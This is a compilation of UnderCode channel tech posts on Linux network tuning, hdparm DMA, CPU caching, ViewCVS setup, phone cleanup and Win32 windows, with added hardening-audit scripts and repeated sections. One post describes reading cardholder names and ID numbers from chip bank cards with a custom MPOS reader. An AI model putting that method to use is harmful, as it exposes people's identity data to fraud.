5) I set up two virtual hosts, mavencn and bsd, corresponding to site.example.com and site.example2dns.com respectively. The default_root attribute in the general section is set for each of the two virtual hosts below.
🦑 Installation precautions
First of all, pay attention to the file and directory permissions in the CVS repository: the account the web server runs as must have read permission. When I use the cvsd service from the FreeBSD ports, I set its umask to 022.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Can you read the ID number from the bank card, do you believe it?
pinterest.com/UnderCodeOfficial
🦑 LETS START:
1) When it comes to sensitive information, the first thing everyone thinks of is the ID number.
2) What harm can come from a leaked ID number? Criminals use it to apply for credit cards, report your bank card lost, commit intermediary fraud, use your identity for other illegal acts, and so on. The harm is very real. Today I will walk through reading the ID number from a chip bank card with you.
🦑 Bank card background
1) From a security point of view, the magnetic stripe card has gradually left the stage. The cloned cards and fraudulent swipes that occur so often today happen on magnetic stripe cards: a magnetic stripe has only three tracks of storage, cloning a bank card generally needs only the track-2 data, and the track-2 data can be read easily with a card reader costing tens of yuan.
2) Switching to a bank card with a chip is far more secure. The issuing bank certificate, the IC card public key certificate and the certification authority certificate form the public/private key hierarchy that protects offline bank card transactions, and online transactions are more secure still, since the UnionPay back end strictly checks the data in each field of each card.
3) Although IC cards have the security features above, there is still a risk of sensitive information being read. According to the transaction flow in the Australia Financial Integrated Circuit (IC) Card specification, someone with ulterior motives can use a POS to run the application selection, application initialization and read application data steps and capture the exchanged data. The TLV-format application data returned at that step may contain the cardholder's identification number. The specific steps follow.
🦑 What I want to accomplish in the experiment:
1) Mobile phone side: use the SDK provided by the Bluetooth chip manufacturer to develop the Android app "Bluetooth MPOS"; the MPOS and the "Bluetooth MPOS" app exchange data over Bluetooth.
2) POS side: write the program in the MPOS microcontroller that completes the data exchange with the IC card and obtains the cardholder name, card number and cardholder ID number.
Note: anyone interested in the technology can contact me privately.
3) After pairing is completed, press the "Cardholder Personal Information" button on the acquiring side.
4) After the MPOS terminal has exchanged data with the IC card and obtained the TLV-format data, it locates the sensitive information and uploads it to the mobile phone.
5) The mobile app parses the name, card number and identity data sent by the POS.
The obtained name, card number and ID number are displayed.
🦑 From the experiment above, a debit card's cardholder name, certificate number and card number can be read out with a mobile phone and a card reader, with no Internet connection needed. But don't worry too much: the name and ID number are not mandatory data in the card, which means not every card exposes the cardholder's name and ID number. Of course, even a card that can be read out cannot be used by just anyone.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Speed optimization - read and write on memory
instagram.com/undercodetestingcompany
🦑 LETS START:
Inside the computer, data is read and written in stages.
1) Reading: for a piece of data to reach the CPU from outside, it must pass through external storage -> memory -> second-level (L2) cache -> first-level (L1) cache -> CPU register, and only then take part in the calculation.
2) Writing: in general, data produced by the CPU is not written to external storage immediately (and may never be). It is usually kept in the cache or memory first, and the write does not take place until the CPU issues the write.
3) When several pieces of data are to be read, they are queued; likewise, several pieces of data to be written are queued.
4) When read and write requests arrive at the same time, the CPU must decide their order.
🦑 Examples:
1) The CPU needs to read a piece of data: if the data is not found in the current register, the CPU looks in the L1 cache; if it is not there, in the L2 cache; then in memory, then in external storage.
2) After the CPU reads a piece of data, memory, the L2 cache and the L1 cache all hold a copy. As reads accumulate the cache fills up, and an eviction strategy is needed: a first-in-first-out method, or the alternative strategy of retaining the most-used data.
3) So there is a great deal of data in the cache or memory, and the CPU also needs a strategy for finding it: association (full association, semi-association, partial association). That is, the cache is divided into several relatively independent areas, and data is looked up according to a fixed rule, which is more efficient.
4) When the CPU has data to be "written" via the cache, that data should be retained preferentially until the CPU's "write" notification arrives.
5) When read and write requirements occur at the same time, two cases arise: read first then write, or write first then read.
🦑 Both cases must be considered carefully. For example:
1) The address to be written is exactly the address to be read. Reading first and writing later returns the old data; when the latest data is needed, that is an error. Writing first and reading later overwrites the original data; when the original data is needed, what is read is also wrong.
2) Even when the address to be written is not the address about to be read, its intermediate results are still held in the cache, which can also produce errors.
This is called data dependence. Try to avoid (or reduce) data dependence when designing a program, even though the compiler optimizes data dependences when the program is compiled.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Speed optimization - enable hard disk DMA support
fb.com/undercodetesting
🦑 LETS START:
DMA support is not enabled after the system is installed. To improve efficiency you can enable it:
1) Add the line /sbin/hdparm -d1 -c3 -m16 /dev/hda to /etc/rc.d/rc.local.
If your hard disk supports ATA33 you can add -X66; for ATA66 it is -X68.
2) For example, for ATA66: /sbin/hdparm -d1 -X68 -c3 -m16 /dev/hda
3) You can use hdparm -Tt /dev/hda to measure the effect before and after adding the line. Be aware that the settings above may bring disaster to your data if the drive does not support them; do not use them at will.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Tutorials for now:
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
> cvs service-ViewCVS install Howto full by undercode
@UnderCodeTesting - e n j o y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 LINUX NET SPEED - overview of tuning methods for Linux network performance
pinterest.com/undercodeOfficial
> In the two articles "Debugging Tools for Tuning Linux Network Performance" and "Tuning Linux Network Performance: Detailed Network Configuration Files", we introduced three network tuning and test tools, route, netstat and tcpdump, the functions they provide, and the contents of the network configuration files. In this article we introduce network performance tuning methods from a practical perspective.
Below, we first introduce the first tuning method: choosing the service mode.
🦑 LETS START:
To overcome the overhead of this process spawning, you can use multi-threaded or asynchronous mode. In multi-threaded mode, several threads within one process provide the service; because the overhead of a thread is small, performance improves. The method that needs no additional overhead at all is asynchronous mode: the server talks to each client in a non-blocking way and uses a single process to poll them. In asynchronous mode the scheduling between tasks is done by the server program itself, so once something goes wrong in one place the whole server has problems; that is outside the scope of this discussion.
Increasing the number of system threads: many factors limit the number of threads, chiefly the number of processes, the size of memory, and the limits on mutexes, semaphores, shared memory and IPC. Generally the maximum number of processes is raised first, then memory is expanded, and then the maximum number of threads is raised. Raising the maximum number of threads is simple: only two places in glibc need to change, the maximum number of threads and the size of the thread stack area. Raising the maximum number of threads comes at the cost of the process's asynchronous I/O performance, so a balance is needed.
Useful content in the network configuration files
1) For a database, increasing the number of shared memory segments and semaphores plays a very important role in improving the efficiency of data transfer.
Method: edit the files linux/include/linux/sem.h and linux/include/asm-i386/shmparam.h.
2) First raise the maximum number of processes, then expand memory, then raise the maximum number of threads; raising the maximum number of threads is simple, just change two places in glibc: the maximum number of threads and the size of the thread stack area.
3) Comment out a line in the /etc/inittab file to prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a secure place.
Edit the inittab file (vi /etc/inittab) and change this line:
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
to:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
then run the following command for the change to take effect:
[root@deep]# /sbin/init q
4) The /etc/host.conf file specifies how host names are resolved. Linux uses the resolver library to obtain the IP address for a host name. The following is an example /etc/host.conf entry:
order bind,hosts: specifies the host name lookup order. Here DNS is queried first and then the /etc/hosts file is searched (or the reverse).
🦑 You can add the following two lines to the file:
multi on: the host may have multiple addresses. A host with several IP addresses is generally called a multi-homed host.
nospoof on: IP address spoofing is not permitted, which improves server security. IP spoofing is a means of attacking a system: by masquerading with another computer's IP address, an attacker can gain the trust of other computers.
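The two edits above (commenting out the ctrlaltdel entry, adding nospoof/multi to host.conf) are easy to get wrong on a fleet, so here is an added check script, not part of the original post, that verifies both. It runs against constructed sample files built inline; the function names and the sample contents are my own, and on a real machine you would call hardening_status /etc/inittab /etc/host.conf.

```shell
#!/bin/sh
# Added example, not from the original post: verify the two hardening edits
# described above (Ctrl-Alt-Delete disabled in inittab, nospoof/multi set in
# host.conf) on constructed sample files, so the check can run anywhere.
# On a real machine call:  hardening_status /etc/inittab /etc/host.conf

# ctrlaltdel_disabled <inittab>
# Returns 0 when no active (uncommented) entry has the action "ctrlaltdel",
# i.e. the line "ca::ctrlaltdel:/sbin/shutdown -t3 -r now" is commented out.
ctrlaltdel_disabled() {
    ! grep -v '^[[:space:]]*#' "$1" | awk -F: '$3 == "ctrlaltdel" { f = 1 } END { exit !f }'
}

# hostconf_setting <host.conf> <keyword>
# Prints the value of the last uncommented "<keyword> <value>" line, or "unset".
hostconf_setting() {
    v=$(grep -v '^[[:space:]]*#' "$1" | awk -v k="$2" '$1 == k { v = $2 } END { print v }')
    echo "${v:-unset}"
}

# hardening_status <inittab> <host.conf>
# Prints one line per finding and returns the number of findings (0 = hardened).
hardening_status() {
    n=0
    if ! ctrlaltdel_disabled "$1"; then
        echo "$1: Ctrl-Alt-Delete still reboots the machine (comment out the ctrlaltdel line)"
        n=$((n + 1))
    fi
    if [ "$(hostconf_setting "$2" nospoof)" != "on" ]; then
        echo "$2: 'nospoof on' is missing"
        n=$((n + 1))
    fi
    if [ "$(hostconf_setting "$2" multi)" != "on" ]; then
        echo "$2: 'multi on' is missing"
        n=$((n + 1))
    fi
    return "$n"
}

# make_samples <dir>: constructed sample files (not copied from any real system);
# the inittab still has the live ctrlaltdel entry and host.conf lacks nospoof.
make_samples() {
    cat > "$1/inittab" <<'EOF'
id:3:initdefault:
si::sysinit:/etc/rc.d/rc.sysinit
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
EOF
    cat > "$1/host.conf" <<'EOF'
order bind,hosts
multi on
EOF
}

demo=$(mktemp -d)
make_samples "$demo"
echo "Before hardening:"
hardening_status "$demo/inittab" "$demo/host.conf" || echo "findings: $?"
# Apply the edits from the post: comment out the ctrlaltdel line, add nospoof on.
sed 's/^ca::ctrlaltdel:/#ca::ctrlaltdel:/' "$demo/inittab" > "$demo/inittab.new"
mv "$demo/inittab.new" "$demo/inittab"
echo "nospoof on" >> "$demo/host.conf"
echo "After hardening:"
hardening_status "$demo/inittab" "$demo/host.conf" && echo "no findings"
rm -rf "$demo"
```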
Tunable Linux kernel network parameters
ICMP related kernel configuration parameters
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Speed up Linux networking - IP-related kernel configuration parameters
twitter.com/UndercodeTC
🦑 LETS START:
The IP configuration parameters among the Linux kernel network parameters are generally used to define or adjust specific properties of IP packets; they also define some network characteristics of the system.
1) ip_default_ttl: sets the time to live of IP packets sent from this machine. The value is an integer in the range 0 to 128, default 64. On Windows systems the IP packet lifetime is usually 128. If your system often receives "Time to live exceeded" ICMP responses, you can raise this value somewhat, but not too far, because if your routing is bad it lengthens the time before the system notices the error.
2) ip_dynaddr: usually used with dial-up connections. It lets the system immediately change the source address of an IP packet to the new IP address, interrupt the original TCP session and resend a SYN request with the new address to start a new TCP session. When using IP masquerading, this parameter immediately switches the masqueraded address to the new IP address. The possible values are:
1: enable the function
2: enable the function in verbose mode
0: disable the function
🦑 Application example: when using ipchains to configure IP masquerading so that a LAN shares a PPP connection to the Internet, it sometimes happens that a site fails to connect but works when you refresh and connect again. Setting this parameter to 1 switches the masqueraded address to the new IP address immediately and solves this kind of problem. The command is:
echo "1" > /proc/sys/net/ipv4/ip_dynaddr
3) ip_forward: enables packet forwarding so that the system acts as a router. When the value is 1, IP forwarding is enabled; when it is 0, IP forwarding is disabled. Note that IP forwarding works on hosts with either one or two network cards.
Application example:
Suppose we use a Linux host with two network cards as the firewall. We must then run the following command to enable IP forwarding:
echo "1" > /proc/sys/net/ipv4/ip_forward
4) ip_local_port_range: sets the port range used when the local system initiates a TCP or UDP connection. The value is two integers and the default is "1024 4999".
Application example:
echo "1450 6000" > /proc/sys/net/ipv4/ip_local_port_range
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Speed up Linux networking tips - kernel network parameters for each network interface
T.me/UnderCodeTesting
🦑 LETS START:
Through the per-interface kernel network parameters you can set the corresponding kernel parameters for a specific network interface such as eth0, eth1 and so on. Note: the parameters under /proc/sys/net/ipv4/conf/all/ apply to all network interfaces.
1) accept_redirects: this parameter is located at /proc/sys/net/ipv4/conf/DEV/accept_redirects (DEV stands for the specific network interface). If there are two routers on your host's network segment, you can set one of them as the default gateway; when that gateway receives your IP packet and finds that it must pass through the other router, it sends you a so-called "redirect" ICMP packet telling you to forward the packet to the other router. The value is Boolean: 1 means accept such ICMP redirects, 0 means ignore them. The default is 0 on a Linux host acting as a router and 1 on an ordinary Linux host. It is recommended to change it to 0, or to use "secure redirects" (see below), to eliminate the security risk.
2) log_martians: logs IP packets containing impossible (illegal) address information to the kernel log. The value is Boolean.
Application:
We discussed the rp_filter reverse-path filtering parameter earlier. Together with it we can execute
echo "1" > /proc/sys/net/ipv4/conf/all/log_martians
so that IP-spoofed packets are recorded in /var/log/messages.
3) forwarding: enables IP forwarding on the specific network interface. The value is Boolean; 1 means forwarding is enabled.
Application example:
echo "1" > /proc/sys/net/ipv4/conf/eth0/forwarding
4) accept_source_route: whether to accept IP packets containing source routing information. The value is Boolean: 1 means accept, 0 means reject. The default is 1 on a Linux host acting as a gateway and 0 on an ordinary Linux host. From a security perspective, we recommend that you turn this feature off.
5) secure_redirects: we mentioned the concept of "secure redirects" above. "Secure redirects" means accepting "redirect" ICMP packets only from a gateway. This parameter sets that function. The value is Boolean: 1 means enabled, 0 means disabled, and the default is enabled.
6) proxy_arp: sets whether the host relays ARP packets on the network. The value is Boolean: 1 means relay, 0 means ignore, and the default is 0. This parameter is usually only useful on Linux hosts acting as routers.
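The IP parameters in this post and in the previous one (ip_forward, accept_redirects, secure_redirects, accept_source_route, log_martians, rp_filter, proxy_arp) are the ones a hardening review checks first. The script below is an added example, not from the original posts: it audits a sysctl tree against hardened values for a chosen host role and prints the echo command that fixes each deviation. The function names, the "host"/"router" roles and the hardened values are my own choices based on the recommendations above; the demo runs on a constructed copy of the /proc/sys layout so it works offline.

```shell
#!/bin/sh
# Added example, not from the original posts: audit the IPv4 kernel network
# parameters discussed above against hardened values for a given host role.
# The sysctl root is a parameter, so the same function can run against a
# constructed copy of /proc/sys (demo below) or the live tree:
#   audit_ipv4_sysctl /proc/sys host
#
# Hardened values, relative to <root>/net/ipv4 (role-independent):
#   accept_redirects=0     do not honour ICMP redirects from arbitrary hosts
#   secure_redirects=1     if redirects are honoured at all, only from gateways
#   accept_source_route=0  refuse source-routed packets
#   log_martians=1         log packets with impossible source addresses
#   rp_filter=1            reverse-path filtering against spoofed sources
#   proxy_arp=0            no ARP relaying on a non-router
HARDENED_IPV4_SETTINGS="
conf/all/accept_redirects=0
conf/all/secure_redirects=1
conf/all/accept_source_route=0
conf/all/log_martians=1
conf/all/rp_filter=1
conf/all/proxy_arp=0
"

# check_param <root> <key> <want>
# Prints one line and returns 1 when the parameter deviates or is missing.
check_param() {
    file="$1/net/ipv4/$2"
    want="$3"
    if [ ! -r "$file" ]; then
        echo "$file: missing (parameter not available on this kernel)"
        return 1
    fi
    have=$(head -n 1 "$file")
    if [ "$have" != "$want" ]; then
        echo "$file is '$have', expected $want (fix: echo \"$want\" > /proc/sys/net/ipv4/$2)"
        return 1
    fi
    return 0
}

# audit_ipv4_sysctl <root> host|router
# Prints one line per deviation; the return status is the deviation count.
audit_ipv4_sysctl() {
    root="$1"
    role="$2"
    case "$role" in
        host)   forward_want=0 ;;   # a plain host must not route packets
        router) forward_want=1 ;;   # a firewall/router needs ip_forward=1
        *) echo "usage: audit_ipv4_sysctl <sysctl-root> host|router" >&2; return 255 ;;
    esac
    bad=0
    for pair in $HARDENED_IPV4_SETTINGS; do
        check_param "$root" "${pair%%=*}" "${pair#*=}" || bad=$((bad + 1))
    done
    check_param "$root" ip_forward "$forward_want" || bad=$((bad + 1))
    return "$bad"
}

# make_demo_tree <dir>: builds a constructed sysctl tree (sample values, not
# read from any real machine) with two weak settings that should be flagged.
make_demo_tree() {
    d="$1/net/ipv4"
    mkdir -p "$d/conf/all"
    echo 1 > "$d/conf/all/accept_redirects"    # weak: the default on a plain host
    echo 1 > "$d/conf/all/secure_redirects"
    echo 0 > "$d/conf/all/accept_source_route"
    echo 0 > "$d/conf/all/log_martians"        # weak: spoofed packets not logged
    echo 1 > "$d/conf/all/rp_filter"
    echo 0 > "$d/conf/all/proxy_arp"
    echo 0 > "$d/ip_forward"
}

demo_root=$(mktemp -d)
make_demo_tree "$demo_root"
echo "Auditing constructed tree $demo_root as a plain host:"
audit_ipv4_sysctl "$demo_root" host || echo "deviations found: $?"
rm -rf "$demo_root"
```

Run it with the router role on a firewall, where ip_forward=1 is expected and a value of 0 is reported as the deviation instead.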
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
pinterest.com/undercodeOfficial
In the two earlier articles "Debugging Tools for Tuning Linux Network Performance" and "Tuning Linux Network Performance: Detailed Network Configuration Files", we introduced three network tuning test tools, route, netstat and tcpdump, the functions they provide, and the contents of the network configuration files. In this article we introduce network performance tuning methods from a practical perspective.
Below, we first introduce the first method of network performance tuning: service mode selection.
To overcome the overhead of spawning processes in this way, you can use multi-threaded or asynchronous mode. In multi-threaded mode, several threads within one process provide the service; since threads are cheap to create, performance improves. The mode that needs no extra overhead at all is asynchronous mode: the server communicates with every client in a non-blocking fashion and uses a single process to poll them. In asynchronous mode the scheduling between tasks is done by the server program itself, so a problem in one place affects the whole server; that is outside the scope of this discussion.
Increasing the number of system threads: many factors limit the number of threads, mainly the maximum number of processes, the size of memory, and the limits on mutexes, semaphores, shared memory and IPC. Generally the maximum number of processes is increased first, then memory is expanded, and then the maximum number of threads is raised. Raising the maximum number of threads is simple: only two places in glibc need changing, the maximum number of threads and the size of the thread stack area. Raising the thread limit comes at the cost of the process's asynchronous I/O performance, so the two need to be balanced.
Useful content in the network configuration file
1) For a database, increasing the number of shared memory segments and semaphores plays a very important role in improving data transfer efficiency;
Method: edit the kernel source files linux/include/linux/sem.h and linux/include/asm-i386/shmparam.h.
2) First increase the maximum number of processes, then expand the memory, and then increase the maximum number of threads; the method to increase the maximum number of threads is simple, just change two places in glibc: the maximum number of threads and the size of the thread stack area;
3) Comment out a line in the /etc/inittab file to prevent the computer from being shut down with Control-Alt-Delete. This is important if the server is not in a physically secure place.
Edit the inittab file (vi /etc/inittab) and change this line:
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
to:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
Use the following command for the change to take effect:
[root@deep]# /sbin/init q
4) The /etc/host.conf file specifies how host names are resolved. Linux uses the resolver library to obtain the IP address corresponding to a host name. The following is an example of /etc/host.conf:
order bind,hosts: specifies the host name lookup order. Here DNS is used to resolve the name first, and then the /etc/hosts file is searched (or vice versa).
You can add the following two lines to the file:
multi on: the specified host can have multiple addresses. A host with multiple IP addresses is generally called a multi-homed host.
nospoof on: disallow IP address spoofing against the resolver, to improve server security. IP spoofing is a means of attacking the security of a system: by masquerading as another computer's IP address, an attacker can gain the trust that other computers place in it.
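The two edits in items 3 and 4 above, as an added example that is not part of the UnderCode post: the functions take the file path as an argument so they can first be run against a copy of /etc/inittab and /etc/host.conf; the function names, the idempotent sed edit and the "replace existing directives, keep everything else" policy for host.conf are this example's own choices, not something the post specifies.

```shell
#!/bin/sh
# Added example (not from the UnderCode post). Harden two host configuration
# files in place and verify the result. Both functions return 0 only when the
# file ends up in the hardened state, so they can be used from a check script.

# disable_ctrlaltdel <inittab>: comment out every active entry whose action
# field is ctrlaltdel (format id:runlevels:action:process). Idempotent: lines
# that are already comments are left untouched. No 'sed -i' so it works with
# both GNU and BSD sed.
disable_ctrlaltdel() {
    f="$1"
    sed 's/^\([^#][^:]*:[^:]*:ctrlaltdel:.*\)$/#\1/' "$f" > "$f.tmp" && mv "$f.tmp" "$f"
    ctrlaltdel_disabled "$f"
}

# ctrlaltdel_disabled <inittab>: 0 if no active ctrlaltdel entry remains.
ctrlaltdel_disabled() {
    ! grep -q '^[^#][^:]*:[^:]*:ctrlaltdel:' "$1"
}

# harden_host_conf <host.conf>: make sure the resolver order and the multi /
# nospoof directives are present exactly once. Existing order/multi/nospoof
# lines are replaced; any other directive (e.g. trim) is preserved.
harden_host_conf() {
    f="$1"
    grep -v -E '^[[:space:]]*(order|multi|nospoof)[[:space:]]' "$f" > "$f.tmp" 2>/dev/null || true
    {
        cat "$f.tmp"
        printf 'order bind,hosts\nmulti on\nnospoof on\n'
    } > "$f"
    rm -f "$f.tmp"
    host_conf_hardened "$f"
}

# host_conf_hardened <host.conf>: 0 if all three directives are active.
host_conf_hardened() {
    grep -q '^order ' "$1" && grep -q '^multi on' "$1" && grep -q '^nospoof on' "$1"
}

# Usage on a live system (as root), after testing on copies:
#   disable_ctrlaltdel /etc/inittab && /sbin/init q
#   harden_host_conf /etc/host.conf
```

Running the functions on copies first matters because a wrong sed expression in /etc/inittab can leave the box unbootable; the check functions give a yes/no answer that a configuration audit can consume.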
Tunable Linux kernel network parameters
ICMP related kernel configuration parameters
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
speedup net linux speed- IP related kernel configuration parameters
twitter.com/UndercodeTC
The IP configuration parameters among the Linux kernel network parameters are usually used to define or adjust specific properties of IP packets; they also define some network characteristics of the system.
1) ip_default_ttl: sets the lifetime (TTL) of IP packets sent from this machine. The parameter value is an integer, the range is 0 to 128, and the default is 64. On Windows systems the TTL of IP packets is usually 128. If your system often receives "Time to live exceeded" ICMP responses, you can raise this value moderately, but not too far: if your routing is bad, a large TTL only lengthens the time the system spends on failing packets.
2) ip_dynaddr: this parameter is usually used with dial-up connections. It lets the system rewrite the source address of an IP packet to the newly assigned IP address immediately, interrupting the original TCP session and resending a SYN request with the new address to start a new TCP session. When IP masquerading is in use, this parameter makes the masqueraded address change to the new IP address at once. The parameter can take the values:
1: enable the function
2: enable the function in verbose mode
0: disable the function
Application example: when using ipchains to configure IP masquerading so that a LAN shares one PPP connection to the Internet, it sometimes happens that a site fails to connect and only succeeds after a refresh. Setting this parameter to 1 makes the masqueraded address change to the new IP address immediately, which solves this kind of problem. The command is:
echo "1" > /proc/sys/net/ipv4/ip_dynaddr
3) ip_forward: this parameter enables packet forwarding so that the system acts as a router. When the value is 1, IP forwarding is enabled; when it is 0, IP forwarding is disabled. Note that IP forwarding can be implemented on hosts with either one or two network cards.
Application example:
Suppose we use a Linux host with two network cards as a firewall. We must then execute the following command to enable IP forwarding:
echo "1" > /proc/sys/net/ipv4/ip_forward
4) ip_local_port_range: sets the port range used when the local system initiates a TCP or UDP connection. The value is two integers and the default is "1024 4999".
Application example:
echo "1450 6000" > /proc/sys/net/ipv4/ip_local_port_range
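An added audit script for the parameters in this post and in the per-interface kernel network parameters post above (accept_redirects, secure_redirects, accept_source_route, log_martians, proxy_arp, forwarding, ip_forward, ip_local_port_range); it is not code from the UnderCode posts. It reads the /proc/sys tree below a root directory given as an argument, so it can be run offline against a constructed copy of the tree as well as against the live system, and compares each value with a hardened baseline. The baseline values, the "host"/"router" role switch that only changes the expected forwarding values, and the function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the UnderCode posts): audit IPv4 kernel parameters
# against a hardened baseline. Prints one line per deviation and returns the
# number of deviations (0 = compliant, capped at 255 for the exit status).

# read_param <file>: print the value without its trailing newline, or
# "missing" when the kernel does not expose that parameter.
read_param() {
    if [ -r "$1" ]; then
        tr -d '\n' < "$1"
    else
        printf 'missing'
    fi
}

# audit_ipv4 [root] [role]
#   root: prefix for /proc/sys ("" = live system)
#   role: "host" (default) or "router"; routers are expected to forward
audit_ipv4() {
    root="${1:-}"
    role="${2:-host}"
    fwd=0
    if [ "$role" = "router" ]; then fwd=1; fi

    # per-interface baseline, checked in every /proc/sys/net/ipv4/conf/<dev>/
    iface_baseline="accept_redirects=0 secure_redirects=0 accept_source_route=0 log_martians=1 proxy_arp=0 forwarding=$fwd"
    # global baseline under /proc/sys/net/ipv4/
    global_baseline="ip_forward=$fwd"

    bad=0
    conf="$root/proc/sys/net/ipv4/conf"
    for dir in "$conf"/*/; do
        [ -d "$dir" ] || continue
        dev=$(basename "$dir")
        for kv in $iface_baseline; do
            key=${kv%%=*}
            want=${kv#*=}
            have=$(read_param "$dir$key")
            if [ "$have" != "$want" ]; then
                printf 'DEVIATION conf/%s/%s=%s (want %s)\n' "$dev" "$key" "$have" "$want"
                bad=$((bad + 1))
            fi
        done
    done
    for kv in $global_baseline; do
        key=${kv%%=*}
        want=${kv#*=}
        have=$(read_param "$root/proc/sys/net/ipv4/$key")
        if [ "$have" != "$want" ]; then
            printf 'DEVIATION %s=%s (want %s)\n' "$key" "$have" "$want"
            bad=$((bad + 1))
        fi
    done
    # ip_local_port_range: flag a lower bound inside the privileged range,
    # since outgoing connections would then compete with listening services.
    set -- $(read_param "$root/proc/sys/net/ipv4/ip_local_port_range")
    if [ "${1:-missing}" = "missing" ] || [ "$1" -lt 1024 ]; then
        printf 'DEVIATION ip_local_port_range=%s %s (want lower bound >= 1024)\n' "${1:-missing}" "${2:-}"
        bad=$((bad + 1))
    fi
    if [ "$bad" -gt 255 ]; then bad=255; fi
    return "$bad"
}

# Usage on the live system:  audit_ipv4 "" host; echo "deviations: $?"
```

The role switch is the important design point: accept_redirects, accept_source_route and log_martians have the same safe value on every box, but forwarding and ip_forward are only "wrong" relative to what the machine is supposed to do, so an audit that ignores the role produces noise on firewalls and silence on workstations that were accidentally turned into routers.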
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
The phone is slowing down. Can cleaning up the garbage fix the freeze? (iPhone / Android analysis)
t.me/UnderCodeTesting
1) Cleaning up RAM
What is RAM? Think of RAM as temporary working storage. The more apps you open, and the heavier each app is, the more RAM is occupied. When RAM is full, the phone starts to stutter badly. (In other words, having free RAM makes no difference until the RAM actually fills up.)
2) Cleaning up the cache
The cache is content that an app stores temporarily in your phone's storage so that it does not need to be downloaded again the next time you view it. For example, photos from a LINE group that you have already looked at open instantly when you tap them, while a photo you have not seen yet has to finish downloading before you can view it.
3) Storage space
Storage space hardly needs explaining: it is the capacity of the iPhone or Android phone. Although both storage and RAM are measured in GB, most phones do not support virtual memory, which means that unused storage is not handed over to RAM.
4) Cleaning up phone junk only changes capacity
Imagine your phone is a car. Cleaning up phone junk is like clearing rubbish and dust out of the car: it frees up room, but it does not affect the speed. What really determines speed is the RAM and the processor.
Tips:
If your phone still feels sluggish, the cause may not be "junk" at all but the apps you use, which demand more resources with every update.
After all, software developers always want more and more features, so software keeps growing heavier.
So if the phone really feels stuck, the most direct and cruel solution may be that it is time for a new phone; cleaning up junk to bring the old one back to life? I'm afraid that is hard.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦from today-posted one :
> Speed optimization-enable hard disk DMA support
> good BIN WWE NETWORT
>Speed optimization-read and write on memory
> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
> cvs service-ViewCVS install Howto full by undercode
> LINUX NET SPEED- Overview of Tuning Methods for Tuning Linux Network Performance
> speedup net linux speed- IP related kernel configuration parameters The
> speedup linux net tips- Kernel network parameters
> tested 5xGeforce Nvidia Bins
> The phone is slowing down. Can cleaning up the garbage fix the freeze? (IPhone / Android analysis)
@UnderCodeTesting - e n j o y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Window, thread, superclass, subclass Full by Undercode
t.me/undercodeTesting
1) Windows windows and messages are discussed here for completeness of the narrative, and processes and threads are discussed briefly. Subclassing and superclassing are two methods of reusing code that accompany the Windows window mechanism. Don't confuse "subclassing, superclassing" with derived and base classes in object-oriented languages: the "class" in "subclassing and superclassing" refers to a Windows window class.
2) The system establishes a message queue for a thread that owns a window. A thread with a message queue can receive messages; for example, we can use the PostThreadMessage function to send messages to a thread.
As soon as a windowless thread calls PeekMessage or GetMessage, the system creates a message queue for it too.
Windows and messages
1) Message queue for threads
Each running program is a process. Each process has one or more threads. Some threads have no windows, and some threads have one or more windows.
We can send messages to threads, but most messages are sent to windows. Messages sent to a window are also placed in the message queue of the thread that owns it. We can think of the thread's message queue as a mailbox and the window as the recipient. When we send a message to a specified window, the system finds the thread to which the window belongs and puts the message into that thread's message queue.
The thread message queue is a data structure inside the system; we cannot see this structure from the program. But through the Windows API we can send and post messages to the message queue, receive messages from it, and translate and dispatch the received messages.
2) The smallest Windows program
Windows programmers have probably seen a minimal Windows program like this:
// Example 1
#include <windows.h>
#include <string.h>

static const char m_szName[] = "window";

// If the main window callback passed everything to DefWindowProc, the message
// loop would never end when the window is closed, so WM_DESTROY is handled here.
static LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    switch (uMsg)
    {
    case WM_DESTROY:
        PostQuitMessage(0); // end the message loop by posting WM_QUIT when the window is closed
        break;
    default:
        return DefWindowProc(hWnd, uMsg, wParam, lParam);
    }
    return 0;
}

// main function
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    WNDCLASS wc;
    memset(&wc, 0, sizeof(WNDCLASS));
    wc.style = CS_VREDRAW | CS_HREDRAW;
    wc.lpfnWndProc = (WNDPROC)WindowProc;
    wc.hInstance = hInstance; // module that owns the class (was missing in the original listing)
    wc.hCursor = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1); // system colour brushes are passed as index + 1
    wc.lpszClassName = m_szName;
    RegisterClass(&wc); // register the window class

    HWND hWnd;
